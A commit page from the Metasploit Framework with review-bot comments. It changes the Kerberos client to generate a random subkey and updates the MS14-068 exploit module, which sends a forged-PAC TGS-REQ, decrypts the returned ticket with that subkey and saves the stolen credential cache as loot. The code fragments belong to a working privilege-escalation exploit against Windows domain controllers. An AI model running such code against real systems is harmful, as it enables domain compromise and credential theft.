
Commit f37cf55

committed
Use random subkey
1 parent ad97457 commit f37cf55


2 files changed

+9
-7
lines changed


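--- a/lib/msf/kerberos/client/tgs_request.rb
+++ b/lib/msf/kerberos/client/tgs_request.rb
@@ -195,7 +195,7 @@ def build_authenticator(opts = {})
 # @see Rex::Proto::Kerberos::Model::EncryptionKey
 def build_subkey(opts={})
 subkey_type = opts[:subkey_type] || Rex::Proto::Kerberos::Crypto::RC4_HMAC
-subkey_value = opts[:subkey_value] || "AAAABBBBCCCCDDDD" #Rex::Text.rand_text(16)
+subkey_value = opts[:subkey_value] || Rex::Text.rand_text(16)
 
 subkey = Rex::Proto::Kerberos::Model::EncryptionKey.new(
 type: subkey_type,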
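Review bot: `Rex::Text.rand_text(16)` on the new line 198 is, as far as I can tell, backed by Kernel#rand rather than a CSPRNG, so it is not an appropriate source for key material; the subkey returned here is what the TGS-REP encrypted part is keyed with, and a stdlib CSPRNG is a one-line change, `subkey_value = opts[:subkey_value] || SecureRandom.random_bytes(16)` (with `require 'securerandom'` alongside the file's other requires). The 16-byte length is also fixed independently of `subkey_type`, whose default is RC4_HMAC; if a caller passes another enctype through `opts[:subkey_type]` the generated key length will no longer match it, so either derive the length from the type or state in the YARD block above that `:subkey_value` must be supplied for non-16-byte enctypes. While touching the signature, `def build_subkey(opts = {})` would match the spacing of `build_authenticator(opts = {})` shown in the hunk header. The method's body continues outside the hunk.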

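--- a/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
+++ b/modules/auxiliary/admin/kerberos/ms14_068_kerberos_checksum.rb
@@ -8,6 +8,7 @@
 
 class Metasploit4 < Msf::Auxiliary
 
+include Msf::Auxiliary::Report
 include Msf::Kerberos::Client
 
 def initialize(info = {})
@@ -51,7 +52,7 @@ def initialize(info = {})
 
 def run
 print_status("#{peer} - Connecting with the KDC...")
-connect(:rhost => datastore['RHOST'])
+connect
 
 unicode_password = Rex::Text.to_unicode(datastore['PASSWORD'])
 password_digest = OpenSSL::Digest.digest('MD4', unicode_password)
@@ -101,6 +102,7 @@ def run
 )
 
 auth_data = build_pac_authorization_data(pac: pac)
+sub_key = build_subkey(subkey_type: Rex::Proto::Kerberos::Crypto::RC4_HMAC)
 
 print_status("#{peer} - Sending TGS-REQ...")
 
@@ -111,7 +113,8 @@ def run
 session_key: session_key,
 ticket: ticket,
 auth_data: auth_data,
-pa_data: pre_auth
+pa_data: pre_auth,
+subkey: sub_key
 )
 
 unless res.msg_type == Rex::Proto::Kerberos::Model::TGS_REP
@@ -121,11 +124,10 @@ def run
 
 print_good("#{peer} - Valid TGS-Response, extracting credentials...")
 
-cache = extract_kerb_creds(res, 'AAAABBBBCCCCDDDD')
+cache = extract_kerb_creds(res, sub_key.value)
 
-f = File.new('/tmp/cache.ticket', 'wb')
-f.write(cache.encode)
-f.close
+path = store_loot('windows.kerberos', 'application/octet-stream', rhost, cache.encode)
+print_good("#{peer} - MIT Credential Cache saved on #{path}")
 end
 end
 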
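Review bot: The `store_loot` call on the new line 129 of the last hunk passes no filename or info argument, so the credential cache is written under an auto-generated loot name with nothing telling an operator what the artifact is; `store_loot` accepts both, so `path = store_loot('windows.kerberos', 'application/octet-stream', rhost, cache.encode, 'kerberos_cache.ticket', 'MIT Kerberos credential cache')` would label it without changing behaviour otherwise. Moving the cache out of the fixed, world-readable `/tmp/cache.ticket` and into loot is the right call, since the file holds a usable ticket and session key. The `subkey_type:` passed to `build_subkey` on line 105 is the same value `build_subkey` defaults to, so it is presumably there for explicitness; a short comment such as `# RC4_HMAC subkey; the same key is used below to decrypt the TGS-REP` would make the coupling with `sub_key.value` on line 127 clearer. `run` starts outside this hunk.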
